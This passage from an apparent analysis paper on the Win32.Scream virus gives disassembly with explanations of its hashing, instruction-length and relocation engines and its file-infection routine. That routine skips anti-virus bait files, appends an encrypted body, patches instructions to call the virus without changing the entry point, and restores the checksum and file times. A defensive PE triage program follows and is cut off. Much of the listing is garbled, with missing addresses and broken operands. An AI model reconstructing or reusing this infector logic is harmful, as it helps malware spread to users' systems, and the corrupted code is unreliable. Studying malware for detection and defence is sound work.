[esp+280h+var_4a4] CODE: mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4ac] CODE: F xor [esp+280h+var_2e0], edi CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: mov [esp+280h+var_4ac], eax CODE:004034A0 add ecx, [esp+280h+var_2e0] CODE:004034A4 ror ebp, 2 CODE:004034A7 lea ecx, [ecx+eax-359d3e2ah] CODE:004034AE mov 
[esp+280h+var_2e0], ecx
59 CODE:004034B2 mov eax, [esp+280h+var_4b4] CODE:004034B9 rol [esp+280h+var_2e0], 5 CODE:004034BE xor eax, [esp+280h+var_4c8] CODE:004034C5 add ebx, [esp+280h+var_2e0] CODE:004034C9 xor eax, [esp+280h+_temp_buffer] CODE:004034D0 mov [esp+280h+var_2e0], edx CODE:004034D4 xor eax, [esp+280h+var_4a8] CODE:004034DB xor [esp+280h+var_2e0], ebp CODE:004034DF rol eax, 1 CODE:004034E1 xor [esp+280h+var_2e0], edi CODE:004034E5 mov [esp+280h+var_4a8], eax CODE:004034EC add ebx, [esp+280h+var_2e0] CODE:004034F0 ror edx, 2 CODE:004034F3 lea ebx, [ebx+eax-359d3e2ah] CODE:004034FA mov [esp+280h+var_2e0], ebx CODE:004034FE mov eax, [esp+280h+var_4b0] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4c4] CODE: add edi, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4dc] CODE: C mov [esp+280h+var_2e0], ecx CODE: xor eax, [esp+280h+var_4a4] CODE: xor [esp+280h+var_2e0], edx CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], ebp CODE: mov [esp+280h+var_4a4], eax CODE: add edi, [esp+280h+var_2e0] CODE: C ror ecx, 2 CODE: F lea edi, [edi+eax-359d3e2ah] CODE: add [esp+280h+var_2dc], edi CODE: A add [esp+280h+var_2d8], ebx CODE: E add [esp+280h+var_2d4], ecx CODE: add [esp+280h+var_2d0], edx CODE: add [esp+280h+var_2cc], ebp CODE: A sub [esp+280h+_count], 40h CODE: F jmp SHA1_Loop CODE: F CODE: CODE: CODE: SHA1_LIPOF: CODE: cmp [esp+280h+_flag], 0 CODE: jz short SHA1_Finishing CODE: CODE: B push 40h CODE: D pop edx CODE: E mov ecx, [esp+280h+_count] CODE: mov [esp+280h+_count], edx CODE: mov eax, ecx CODE: lea edi, [esp+280h+_temp_buffer] CODE: F test eax, eax CODE: jz short only_null CODE: CODE: rep movsb CODE: CODE: CODE: only_null: CODE: mov ecx, eax
60 CODE: mov al, 80h CODE: stosb CODE: A sub ecx, 37h CODE: D neg ecx CODE: F jz short save_size_in_pad CODE: F CODE: jns short zero_mem CODE: CODE: add [esp+280h+_count], edx CODE: add ecx, edx CODE: CODE: CODE: zero_mem: CODE: xor al, al CODE: B rep stosb CODE: B CODE: D CODE: D save_size_in_pad: CODE: D xor edx, edx CODE: F mov eax, [esp+280h+_size] CODE:004035A3 push 8 CODE:004035A5 pop esi CODE:004035A6 mul esi CODE:004035A8 bswap eax CODE:004035AA bswap edx CODE:004035AC mov [edi], edx CODE:004035AE mov [edi+4], eax CODE:004035B1 lea esi, [esp+280h+_temp_buffer] CODE:004035B8 mov [esp+280h+_flag], 0 CODE:004035C0 jmp SHA1_Loop CODE:004035C0 CODE:004035C5 CODE:004035C5 CODE:004035C5 SHA1_Finishing: CODE:004035C5 mov edi, [esp+280h+arg_0] CODE:004035CC lea esi, [esp+280h+var_2dc] CODE:004035D0 push 5 CODE:004035D2 pop ecx CODE:004035D2 CODE:004035D3 CODE:004035D3 SHA1_CopyResult: CODE:004035D3 mov eax, [esi+ecx*4-4] CODE:004035D7 bswap eax CODE:004035D9 mov [edi+ecx*4-4], eax CODE:004035DD dec ecx CODE:004035DE jnz short SHA1_CopyResult CODE:004035DE CODE:004035E0 push 38h CODE:004035E2 pop ecx CODE:004035E3 xor eax, eax CODE:004035E5 lea edi, [esp+280h+_temp_buffer] CODE:004035EC rep stosd CODE:004035EE add esp, 260h CODE:004035F4 popa CODE:004035F5 retn 0Ch CODE:004035F5 CODE:004035F5 SHA1 endp
The previous code block hashes data for the virus. The function takes 3 parameters: the address of the data to be hashed, the number of bytes to hash, and a pointer to the buffer that receives the 20-byte message digest.

CODE:004035F8 ILE proc near
CODE:004035F8 push esi
CODE:004035F9 push edi
CODE:004035FA cld
CODE:004035FB call GetPrefixes
CODE: call FindOpcode
CODE: jb
CODE: push ebx
CODE: xchg esi, edi
CODE: A movzx ecx, bl
CODE: D and cl, 3
CODE: add esi, ecx
CODE: cmp cl, 1
CODE: jnz
CODE: cmp al, 0F6h
CODE: jz
CODE: B cmp al, 0F7h
CODE: D jnz
CODE: F push ecx
CODE: mov cl, [esi]
CODE: and cl, 38h
CODE: pop ecx
CODE: jnz
CODE: or bl, 24h
CODE: B and bl, 3Fh
CODE: E cmp al, 0F6h
CODE: jz
CODE: or bl, 94h
CODE: and bl, 0DFh
CODE: test bl, 4
CODE: B jz
CODE: D push eax
CODE: E call DecodeModRM
CODE: pop eax
CODE: test bh, 2
CODE: jz
CODE: test bl, 10h
CODE: C jz
CODE: E shr bl, 5
CODE: add cl, bl
CODE: sub cl, 2
CODE: add ecx, edx
CODE: pop ebx
CODE: jmp
CODE: B shr bl, 5
CODE: E add cl, bl
CODE: add ecx, edx
CODE: pop ebx
CODE: pop edi
CODE: pop esi
CODE: retn
CODE: ILE endp

The previous code block is the main function of the Instruction Length Engine (ILE). The function expects a pointer to the instruction in the ESI register.

CODE: GetPrefixes proc near
CODE: xor ebx, ebx
CODE: xor edx, edx
CODE: A lea edi, PrefixBuffer
CODE: xchg esi, edi
CODE: push 0Bh
CODE: pop ecx
CODE: lodsb
CODE: cmp [edi], al
CODE: jnz
CODE: A push 0Ch
CODE: C pop ecx
CODE: D inc edx
CODE: E inc edi
CODE: F lea esi, PrefixBuffer
CODE: cmp al, 67h
CODE: jnz short
CODE: or bh, 1
CODE: C cmp al, 66h
CODE: E jnz
CODE: or bh, 2
CODE: cmp al, 64h
CODE: jnz
CODE: or bh, 4
CODE: C retn
CODE: C GetPrefixes endp

The previous code block counts the instruction prefixes and advances ESI past them. The function expects a pointer to the instruction in the ESI register.

CODE: D FindOpcode proc near
CODE: D var_1 = byte ptr -1
CODE: D push ebx
CODE: E push edx
CODE: F lea esi, OpcodeTable
CODE:004036A5 lodsw
CODE:004036A7 movzx ecx, al
CODE:004036AA mov bl, ah
CODE:004036AC stc
CODE:004036AD jecxz
CODE:004036AF movzx edx, bl
CODE:004036B2 and dl, 3
CODE:004036B5 dec edx
CODE:004036B6 jz
CODE:004036B8 dec edx
CODE:004036B9 jz short
CODE:004036BB mov edx, [edi]
CODE:004036BD shl edx, 8
CODE:004036C0 lodsd
CODE:004036C1 dec esi
CODE:004036C2 shl eax, 8
CODE:004036C5 cmp eax, edx
CODE:004036C7 jz
CODE:004036C9
CODE:004036CB jmp
CODE:004036CD movzx edx, word ptr [edi]
CODE:004036D0 test bl, 1000b
CODE:004036D3 jz
CODE:004036D5 and dh, b
CODE:004036D8 lodsw
CODE:004036DA cmp ax, dx
CODE:004036DD jz
CODE:004036DF
CODE:004036E1 jmp
CODE:004036E3 mov dl, [edi]
CODE:004036E5 test bl, 8
CODE:004036E8 jz
CODE:004036EA and dl, 0F8h
CODE:004036ED lodsb
CODE:004036EE cmp al, dl
CODE:004036F0 jz
CODE:004036F2
CODE:004036F4 jmp short
CODE:004036F6 clc
CODE:004036F7 mov [esp+5+var_1], bl
CODE:004036FB pop edx
CODE:004036FC pop ebx
CODE:004036FD retn
CODE:004036FD FindOpcode endp

The previous code block looks up the opcode in the opcode tables. The function expects a pointer to the opcode in the EDI register.

CODE:004036FE DecodeModRM proc near
CODE:004036FE test bh, 1
CODE: jnz
CODE: inc ecx
CODE: lodsb
CODE: mov ah, al
CODE: and ah, 0C0h
CODE: A jz
CODE: C cmp ah, 0C0h
CODE: F jz
CODE: inc ecx
CODE: cmp ah, 40h
CODE: jz
CODE: test bh, 1
CODE: A jnz
CODE: C inc ecx
CODE: D inc ecx
CODE: E inc ecx
CODE: F mov ah, al
CODE: and ah, b
CODE: cmp ah, 101b
CODE: jnz
CODE: add ecx, 4
CODE: C mov ah, al
CODE: E and ah, 7
CODE: cmp ah, 4
CODE: jnz
CODE: inc ecx
CODE: mov ah, al
CODE: lodsb
CODE: A and ax, b
CODE: E cmp ax, b
CODE: jz
CODE: cmp al, 101b
CODE: jnz
CODE: add ecx, 11b
CODE: B inc ecx
CODE: C retn
CODE: D inc ecx
CODE: E lodsb
CODE: F mov ah, al
CODE: and ah, 0C0h
CODE: jz
CODE: cmp ah, 0C0h
CODE: jz
CODE: B cmp ah, 40h
CODE: E jz
CODE: inc ecx
CODE: inc ecx
CODE: retn
CODE: and al, 7
CODE: cmp al, 6
CODE: jz
CODE: retn
CODE: DecodeModRM endp

The previous code block decodes the ModR/M byte, in both its 32-bit and its 16-bit (ModR/M16) addressing forms. The function expects a pointer to the ModR/M byte in the ESI register and the instruction length accumulated so far in the ECX register.

CODE: A InfectFile proc near
CODE: A var_46c = dword ptr -46Ch
CODE: A pusha
CODE: B cmp InfectState, 0
CODE: jnz
CODE: or InfectState, 0FFFFFFFFh
CODE: B lea ebx, sub_403ccc
CODE: mov [ebp+0f4h], ebx
CODE: lea
CODE: D mov [ebp+0f8h], ebx
CODE: mov [ebp+0fch], esp
CODE: lea ebx, [ebp+0f0h]
CODE: F push ebx
CODE:004037A0 xor ebx, ebx
CODE:004037A2 push dword ptr fs:[ebx]
CODE:004037A5 pop dword ptr [ebp+0f0h]
CODE:004037AB pop dword ptr fs:[ebx]
CODE:004037AE lea esi, [ebp+168h]
CODE:004037B4 call Uppercase
CODE:004037B9 mov edi, esi
CODE:004037BB mov ebx, esi
CODE:004037BD lodsb
CODE:004037BE test al, al
CODE:004037C0 jz
CODE:004037C2 cmp al, '\'
CODE:004037C4 jnz
CODE:004037C6 mov ebx, esi
CODE:004037C8 jmp short
CODE:004037CA xchg esi, edi
CODE:004037CC cmp dword ptr [edi-5], 'EXE.'
CODE:004037D3 jz short
CODE:004037D5 cmp dword ptr [edi-5], 'LPC.'
CODE:004037DC jz short
CODE:004037DE cmp dword ptr [edi-5], 'CXO.'
CODE:004037E5 jz short
CODE:004037E7 cmp dword ptr [edi-5], 'RCS.'
CODE:004037EE jnz
CODE:004037F4 lea edi, Shit_List_Table
CODE:004037FA xchg edi, esi
CODE:004037FC lodsw
CODE:004037FE cmp [ebx], ax
CODE: jz
CODE: test ax, ax
CODE: A jnz short
CODE: C cmp dword ptr [ebx], 'TAOG'
CODE: jnz
CODE: mov ecx, [ebp+15ch]
CODE: E cmp ecx, 8000h
CODE: jnb short
CODE: mov eax, 0Ah
CODE: B call RandomNumber
CODE: test eax, eax
CODE: jnz
CODE: cmp ecx, h
CODE: E jbe short
CODE: mov eax, 20h
CODE: call RandomNumber
CODE: A test eax, eax
CODE: C jnz
CODE: cmp SFC_enabled, 0
CODE: jnz
CODE: B push ebx
CODE: C push 0
CODE: E mov al, 21h
CODE: call StealthAPI
CODE: test eax, eax
CODE: D push 80h
CODE: push edi
CODE: mov al, 11h
CODE: call StealthAPI
CODE: A test eax, eax
CODE: lea eax, [ebp+168h]
CODE: push 0
CODE: A push 80h
CODE: F push 3
CODE: push 0
CODE: push 0
CODE: push 0C h
CODE: A push eax
CODE: B mov al, 14h
CODE: D call StealthAPI
CODE:004038A2 mov [ebp+134h], eax
CODE:004038A8 inc eax
CODE:004038AF mov ecx, [ebp+15ch]
CODE:004038B5 call MapFile
CODE:004038C0 cmp word ptr [eax], 'ZM'
CODE:004038CB xor edx, edx
CODE:004038CD call GetSection
CODE:004038D2 cmp dword ptr [esi], 'EP'
CODE:004038DE test dword ptr [ebx+24h], h
CODE:004038EB mov eax, [esi+50h]
CODE:004038EE cmp eax, [ebp+15ch]
CODE:004038F4 jnz
CODE:004038FA mov eax, [ebx+10h]
CODE:004038FD test eax, eax
CODE:004038FF jz
CODE: sub eax, [ebx+8]
CODE: neg eax
CODE: A jge short
CODE: C mov eax, [ebx+10h]
CODE: F mov [ebx+8], eax
CODE: xor eax, eax
CODE: mov [ebp+288h], eax
CODE: A add eax, 368Ch
CODE: F add eax, [ebx+10h]
CODE: add eax, [ebx+14h]
CODE: mov ecx, [esi+3ch]
CODE: add eax, ecx
CODE: A div ecx
CODE: C mul ecx
CODE: E mov [esi+50h], eax
CODE: mov [ebp+28ch], eax
CODE: push eax
CODE: push dword ptr [ebp+284h]
CODE: E mov al, 0Ah
CODE: call StealthAPI
CODE: push dword ptr [ebp+138h]
CODE: B mov al, 5
CODE: D call StealthAPI
CODE: pop ecx
CODE: call MapFile
CODE: E call GetSection
CODE: mov edi, [ebx+14h]
CODE: add edi, [ebx+10h]
CODE: add edi, [ebp+284h]
CODE: F mov ecx, [ebp+288h]
CODE: jecxz
CODE: add [ebx+10h], ecx
CODE: A xor eax, eax
CODE: C rep stosb
CODE: E mov [ebp+2b4h], edi
CODE: push esi
CODE: mov ecx, 368Ch
CODE: A lea esi, EntryPoint
CODE: rep movsb
CODE: pop esi
CODE: pusha
CODE: mov edx, [ebx+0ch]
CODE: add edx, [ebx+10h]
CODE: A mov [ebp+2b0h], edx
CODE:004039A0 add edx, [esi+34h]
CODE:004039A3 lea eax, EntryPoint
CODE:004039A9 sub edx, eax
CODE:004039AB lea esi, [edi-368ch]
CODE:004039B1 sub edi, 88Ah
CODE:004039B7 call HMA
CODE:004039BC lea edi, [esi+2f3eh]
CODE:004039C2 mov ecx, 20h
CODE:004039C7 xor eax, eax
CODE:004039C9 rep stosb
CODE:004039CB lea edi, [esi+2f16h]
CODE:004039D1 lea esi, [esi+276ah]
CODE:004039D7 push 0FFFFFh
CODE:004039DC push 698h
CODE:004039E1 push esi
CODE:004039E2 push edi
CODE:004039E3 call RDKE32Encrypt
CODE:004039E8 popa
CODE:004039E9 mov eax, 368Ch
CODE:004039EE mov ecx, [esi+3ch]
CODE:004039F1 add eax, ecx
CODE:004039F3 xor edx, edx
CODE:004039F5 div ecx
CODE:004039F7 mul ecx
CODE:004039F9 add [ebx+10h], eax
CODE:004039FC add [ebx+8], eax
CODE:004039FF sub eax, 368Ch
CODE:00403A04 xchg eax, ecx
CODE:00403A05 xor eax, eax
CODE:00403A07 rep stosb
CODE:00403A09 mov dword ptr [ebx+24h], 0E h
CODE:00403A10 add dword ptr [esi+64h], 2000h
CODE:00403A17 pusha
CODE:00403A18 call GetSection
CODE:00403A1D or dword ptr [eax+24h], 0E h
CODE:00403A24 add eax, 28h
CODE:00403A27 cmp eax, ebx
CODE:00403A29 jnz short
CODE:00403A2B popa
CODE:00403A2C call GetSection
CODE:00403A31 mov ebx, [esi+28h]
CODE:00403A34 xchg eax, esi
CODE:00403A35 sub esi, 28h
CODE:00403A38 add esi, 28h
CODE:00403A3B mov eax, [esi+0ch]
CODE:00403A3E cmp eax, ebx
CODE:00403A40 ja short
CODE:00403A42 add eax, [esi+8]
CODE:00403A45 cmp eax, ebx
CODE:00403A47 jb short
CODE:00403A49 mov [ebp+290h], esi
CODE:00403A4F or dword ptr [esi+24h], h
CODE:00403A56 mov edi, [ebp+284h]
CODE:00403A5C mov edx, [esi+14h]
CODE:00403A5F add edx, edi
CODE:00403A61 mov [ebp+294h], edx
CODE:00403A67 add edx, [esi+10h]
CODE:00403A6A mov [ebp+298h], edx
CODE:00403A70 sub ebx, [esi+0ch]
CODE:00403A73 add ebx, [esi+14h]
CODE:00403A76 lea esi, [ebx+edi]
CODE:00403A79 sub esp, 400h
CODE:00403A7F mov [ebp+2a4h], esp
CODE:00403A85 and dword ptr [ebp+2a0h], 0
CODE:00403A8C mov eax, 10h
CODE:00403A91 call RandomNumber
CODE:00403A96 inc eax
CODE:00403A97 mov [ebp+2ach], eax
CODE:00403A9D and dword ptr [ebp+2a8h], 0
CODE:00403AA4 mov dword ptr [ebp+2fch], 10000h
CODE:00403AAE cmp esi, [ebp+294h]
CODE:00403AB4 jb
CODE:00403AB6 cmp esi, [ebp+298h]
CODE:00403ABC ja
CODE:00403ABE call ILE
CODE:00403AC3 test ecx, ecx
CODE:00403AC5 jz
CODE:00403AC7 dec dword ptr [ebp+2fch]
CODE:00403AD3 cmp ecx, 5
CODE:00403ADC cmp dword ptr [ebp+2b8h], 0
CODE:00403AE3 jz
CODE:00403AE5 dec dword ptr [ebp+2b8h]
CODE:00403AF0 mov ecx, [ebp+2a0h]
CODE:00403AF6 test ecx, ecx
CODE:00403AFE mov esi, [ebp+2a4h]
CODE:00403B04 dec ecx
CODE:00403B05 lea esi, [esi+ecx*4]
CODE:00403B08 mov esi, [esi]
CODE:00403B0A dec dword ptr [ebp+2a0h]
CODE:00403B10 jmp
CODE:00403B12 push eax
CODE:00403B13 mov eax, 64h
CODE:00403B18 call RandomNumber
CODE:00403B1D test eax, eax
CODE:00403B1F pop eax
CODE:00403B20 jnz
CODE:00403B22 mov edi, [ebp+2a8h]
CODE:00403B28 cmp edi, [ebp+2ach]
CODE:00403B34 pusha
CODE:00403B35 mov ebx, esi
CODE:00403B37 lea esi, [ebp+2bch]
CODE:00403B3D mov ecx, [ebp+2a8h]
CODE:00403B43 jecxz
CODE:00403B45 lodsd
CODE:00403B46 cmp eax, ebx
CODE:00403B48 jnz
CODE:00403B4A popa
CODE:00403B4B jmp
CODE:00403B4F popa
CODE:00403B50 mov [ebp+edi*4+2bch], esi
CODE:00403B57 inc dword ptr [ebp+2a8h]
CODE:00403B5D push eax
CODE:00403B5E mov eax, 40h
CODE:00403B63 call RandomNumber
CODE:00403B68 mov [ebp+2b8h], eax
CODE:00403B6E pop eax
CODE:00403B6F pusha
CODE:00403B70 pusha
CODE:00403B71 xchg eax, edx
CODE:00403B72 mov edi, esi
CODE:00403B74 test bl, 10b
CODE:00403B77 jz short
CODE:00403B79 mov ebx, 24h
CODE:00403B7E cmp dx, 0F80h
CODE:00403B83 jz short
CODE:00403B85 cmp dx, 0F88h
CODE:00403B8A jnz short
CODE:00403B8C lea esi, SpecialHandlers
CODE:00403B92 add ebx, esi
CODE:00403B94 jmp ebx
CODE:00403B96 lea esi, EIPOpcodeTable
CODE:00403B9C lodsb
CODE:00403B9D movzx ecx, al
CODE:00403BA0 jecxz short
CODE:00403BA2 lodsd
CODE:00403BA3 xchg eax, ebx
CODE:00403BA4 lodsb
CODE:00403BA5 cmp al, dl
CODE:00403BA7 jz short
CODE:00403BA9 loop
CODE:00403BAB jmp short
CODE:00403BAD cmp dl, 0FFh
CODE:00403BB0 jnz short
CODE:00403BB2 mov esi, edi
CODE:00403BB4 inc esi
CODE:00403BB5 lodsb
CODE:00403BB6 and al, 38h
CODE:00403BB8 cmp al, 20h
CODE:00403BBA jz SpecialHandlers
CODE:00403BC0 popa
CODE:00403BC1 clc
CODE:00403BC2 popa
CODE:00403BC3 jb
CODE:00403BC9 add esi, ecx
CODE:00403BCB jmp
CODE:00403BD0 mov eax, [ebp+2a4h]
CODE:00403BD6 lea esp, [eax+400h]
CODE:00403BDC mov ecx, [ebp+2a8h]
CODE:00403BE2 jecxz short
CODE:00403BE4 dec ecx
CODE:00403BE5 mov esi, [ebp+ecx*4+2bch]
CODE:00403BEC push esi
CODE:00403BED imul edi, ecx, 9
CODE:00403BF0 add edi, [ebp+2b4h]
CODE:00403BF6 add edi, 2F93h
CODE:00403BFC push edi
CODE:00403BFD movsb
CODE:00403BFE movsd
CODE:00403BFF call GetSection
CODE:00403C04 pop edx
CODE:00403C05 pop edi
CODE:00403C06 mov al, 0E8h
CODE:00403C08 stosb
CODE:00403C09 lea eax, [edi+4]
CODE:00403C0C sub eax, [ebp+294h]
CODE:00403C12 mov ebx, [ebp+290h]
CODE:00403C18 add eax, [ebx+0ch]
CODE:00403C1B push dword ptr [esi+34h]
CODE:00403C1E pop dword ptr [edx-4]
CODE:00403C21 add [edx-4], eax
CODE:00403C24 sub eax, [ebp+2b0h]
CODE:00403C2A neg eax
CODE:00403C2C stosd
CODE:00403C2D test ecx, ecx
CODE:00403C2F jnz short
CODE:00403C31 push 0
CODE:00403C33 mov eax, esp
CODE:00403C35 push 0
CODE:00403C37 push esp
CODE:00403C38 push eax
CODE:00403C39 push dword ptr [ebp+28ch]
CODE:00403C3F push dword ptr [ebp+284h]
CODE:00403C45 mov al, 20h
CODE:00403C47 call StealthAPI
CODE:00403C4C mov ebx, [esp+46ch+var_46c]
CODE:00403C4F mov [eax+58h], ebx
CODE:00403C52 add esp, 8
CODE:00403C55 inc dword ptr [ebp+280h]
CODE:00403C5B push dword ptr [ebp+284h]
CODE:00403C61 mov al, 0Ah
CODE:00403C63 call StealthAPI
CODE:00403C68 push dword ptr [ebp+138h]
CODE:00403C6E mov al, 5
CODE:00403C70 call StealthAPI
CODE:00403C75 lea eax, [ebp+150h]
CODE:00403C7B push eax
CODE:00403C7C lea eax, [ebp+148h]
CODE:00403C82 push eax
CODE:00403C83 lea eax, [ebp+140h]
CODE:00403C89 push eax
CODE:00403C8A push dword ptr [ebp+134h]
CODE:00403C90 mov al, 12h
CODE:00403C92 call StealthAPI
CODE:00403C97 push dword ptr [ebp+134h]
CODE:00403C9D mov al, 5
CODE:00403C9F call StealthAPI
CODE:00403CA4 lea eax, [ebp+168h]
CODE:00403CAA push dword ptr [ebp+13ch]
CODE:00403CB0 push eax
CODE:00403CB1 mov al, 11h
CODE:00403CB3 call StealthAPI
CODE:00403CB8 xor ebx, ebx
CODE:00403CBA push dword ptr [ebp+0f0h]
CODE:00403CC0 pop dword ptr fs:[ebx]
CODE:00403CC3 popa
CODE:00403CC4 and InfectState, 0
CODE:00403CCB retn
CODE:00403CCB InfectFile endp
CODE:00403CF3 SpecialHandlers:
CODE:00403CF3 popa
CODE:00403CF4 popa

The previous code decides whether a file can be infected and, if so, infects it. An SEH frame pointing at sub_403CCC is installed first (fs:[0]), so a malformed file aborts the infection instead of crashing the host. Only files whose uppercased extension is .EXE, .CPL, .OCX or .SCR are considered; the file name is then matched against a list of two-character prefixes (Shit_List_Table) and against "GOAT" (the bait files anti-virus researchers use), and both are skipped. Files smaller than 32 KB (8000h) are skipped unless RandomNumber(0Ah) returns zero, and files above the upper size bound (1024 KB) are skipped unless RandomNumber(20h) returns zero, so the nominal 32 KB to 1024 KB window has random exceptions on both sides. If sfc.dll was loaded (SFC_enabled), files protected by SFC/SFP/WFP are skipped (StealthAPI index 21h). The file attributes are cleared (index 11h), the file is opened for read/write access (index 14h) and mapped with MapFile. The 'MZ' and 'PE' signatures are required, and the infection mark in the last section header's Characteristics is tested so that an already infected file is left alone. The virus body (368Ch bytes, copied from EntryPoint) is appended to the last section, padded to FileAlignment; HMA relocates its hard-coded addresses to the new image position, RDKE32Encrypt encrypts the infection code, every section header receives the RWX bits (IMAGE_SCN_MEM_EXECUTE | READ | WRITE, the or dword ptr [eax+24h] loop), SizeOfStackCommit is raised by 2000h and the executable flag on the last section becomes the infection mark. The entry point itself is not changed (EPO): ILE walks the section containing the entry point, keeping a worklist of addresses on the stack (sub esp,400h), and collects a random number (1 to 16) of instructions at least 5 bytes long, thinned by a one-in-100 random pick and a random gap (RandomNumber(40h)) between patches and matched against EIPOpcodeTable; each chosen instruction is overwritten with a call (0E8h) into the virus body, and a 9-byte table entry in the body (the return address followed by the original 5 bytes) records what was overwritten. Finally the PE checksum is recomputed (the call shape of index 20h matches CheckSumMappedFile from imagehlp) and stored in OptionalHeader.CheckSum ([eax+58h]), the view and the mapping are closed, and the saved file times (index 12h) and attributes (index 11h) are restored.

CODE:00403D78 GetSection proc near
CODE:00403D78 mov esi, [ebp+284h]
CODE:00403D7E add esi, [esi+3ch]
CODE:00403D81 movzx eax, word ptr [esi+14h]
CODE:00403D85 lea eax, [eax+esi+18h]
CODE:00403D89 movzx ebx, word ptr [esi+6]
CODE:00403D8D dec ebx
CODE:00403D8E imul ebx, 28h
CODE:00403D91 add ebx, eax
CODE:00403D93 retn
CODE:00403D93 GetSection endp

The previous code block calculates a pointer to the last section header. [ebp+284h] holds the base of the file mapping; ESI is set to the NT headers (base plus e_lfanew), EAX to the first section header (NT headers + 18h + SizeOfOptionalHeader) and EBX to the last one ((NumberOfSections - 1) * 28h past EAX). Callers rely on all three registers.

CODE:00403D94 MapFile proc near
CODE:00403D94 push 0
CODE:00403D96 push ecx
CODE:00403D97 push 0
CODE:00403D99 push 4
CODE:00403D9B push 0
CODE:00403D9D push dword ptr [ebp+134h]
CODE:00403DA3 mov al, 0Bh
CODE:00403DA5 call StealthAPI
CODE:00403DAA test eax, eax
CODE:00403DAC jz short
CODE:00403DAE mov [ebp+138h], eax
CODE:00403DB4 push 0
CODE:00403DB6 push 0
CODE:00403DB8 push 0
CODE:00403DBA push 6
CODE:00403DBC push eax
CODE:00403DBD mov al, 9
CODE:00403DBF call StealthAPI
CODE:00403DC4 mov [ebp+284h], eax
CODE:00403DCA test eax, eax
CODE:00403DCC retn
CODE:00403DCC MapFile endp

The previous code block maps the file into memory so that it can be edited in place. StealthAPI index 0Bh creates a file mapping of the size in ECX with protection 4 (PAGE_READWRITE) and index 9 maps a view of it with access 6 (FILE_MAP_READ | FILE_MAP_WRITE); the call shapes match CreateFileMapping and MapViewOfFile. The mapping handle is kept in [ebp+138h] and the view base in [ebp+284h]; the caller tests ZF for failure.

CODE:00403DCD HMA proc near
CODE:00403DCD pusha
CODE:00403DCE push esi
CODE:00403DCF push edx
CODE:00403DD0 call ILE
CODE:00403DD5 add esi, edx
CODE:00403DD7 pop edx
CODE:00403DD8 or bh, bh
CODE:00403DDA jnz
CODE:00403DDC inc esi
CODE:00403DDD cmp al, 0A1h
CODE:00403DDF jz
CODE:00403DE1 cmp al, 0A3h
CODE:00403DE3 jz
CODE:00403DE5 dec esi
CODE:00403DE6 test bl, 4
CODE:00403DE9 jz
CODE:00403DEB and bl, 3
CODE:00403DEE add esi, ebx
CODE:00403DF0 lodsb
CODE:00403DF1 and al, 0C7h
CODE:00403DF3 cmp al, 5
CODE:00403DF5 jnz
CODE:00403DF7 add [esi], edx
CODE:00403DF9 pop esi
CODE:00403DFA add esi, ecx
CODE:00403DFC cmp esi, edi
CODE:00403DFE jnz short
CODE:00403E00 popa
CODE:00403E01 retn
CODE:00403E01 HMA endp

The previous code block is the main routine of the Hard coded Memory Access engine (HMA). It expects the start of the code in ESI, the end of the code in EDI and the relocation delta (new address minus old address, computed by the caller in InfectFile) in EDX. For every instruction ILE returns the length in ECX and, in EBX, flags describing the encoding; when BH is non-zero (prefixed instructions, which the engine leaves alone) the instruction is skipped. Otherwise, if the opcode is A1h or A3h (mov eax,[mem32] / mov [mem32],eax) the delta is added to the 32-bit address that follows the opcode; if the instruction has a ModR/M byte (test bl,4) whose mod=00 and rm=101 (and al,0C7h / cmp al,5, i.e. a bare disp32), the delta is added to that disp32. Any other addressing form, including [base+disp32] and SIB forms, is left untouched, which is why the virus body must be written so that every hard-coded address uses one of these two encodings.

CODE: D FRC_MakeCRC32Table proc near
CODE: D pusha
CODE: E cld
CODE: F mov al, [esi]
CODE: test al, al
CODE: jnz short
CODE: popa
CODE: retn
CODE: call GetCRC32OfString
CODE: C xchg eax, ebx
CODE: D stosd
CODE: E jmp short
CODE: E FRC_MakeCRC32Table endp

The previous code block builds one of the CRC32 tables the virus uses later: it walks a list of NUL-terminated API names at ESI, ending at an empty string, computes the CRC32 of each name with GetCRC32OfString and stores the hashes consecutively at EDI. StealthAPI resolves imports by comparing these hashes against the hashes of a module's export names, so the API names never have to appear in the infected file (the callers in the initialisation code pass the kernel32, imagehlp, sfc and winmm name lists).

CODE: FRC_FakeHost
CODE: dd h, 0FFB99090h, 90FFFFFFh, 68006A90h
CODE: dd offset NAME_SFC_DLL
CODE: db 68h
CODE: dd offset NAME_IMAGEHLP_DLL
CODE: db 6Ah, 0, 0E8h
CODE: dd 40Bh, 0F8E8006Ah
CODE: db 3, 2 dup(0)

The previous data block is the fake host of the virus, the first-generation carrier: a few hand-assembled bytes that push the sfc.dll and imagehlp.dll name strings (68h is push imm32, 0E8h is call rel32), show a message and then exit.

5. Conclusion

So, this was a journey through Win32.Scream, and an interesting one. I have reversed all of its internals and documented them as well; you will find more information in each separate file in the package.

6. Contact

You can contact me either by e-mail or by IM. Feel free to write and send me your comments, ideas, feedback or criticism. For better security it is preferable to send me mails signed with my key, but it is not mandatory.

E-Mail: iamhalsten [at] gmail [dot] com
IM: iamhalsten [at] hotmail [dot] com
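Returning to the InfectFile and GetSection routines above: the traits they leave in a file (every section header marked RWX, the executable flag on the last section used as the infection mark, an entry point that stays in the host's own code) are exactly what a responder can check for in a PE sample. The following program is an added example and is not code from the paper or from the virus. It reproduces GetSection's pointer arithmetic to find the last section header and reports those indicators; the PE32 field offsets are the standard ones, and the test image it builds is constructed for the example (a header-only image, not a real binary). Note that a checksum comparison is not on the list, because InfectFile recomputes the checksum after infection.

```c
/* Added example: PE triage for Scream-style infection traits. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SCN_EXECUTE 0x20000000u
#define SCN_RWX     0xE0000000u   /* IMAGE_SCN_MEM_EXECUTE | READ | WRITE */

/* Little-endian field access that does not rely on struct packing. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

typedef struct {
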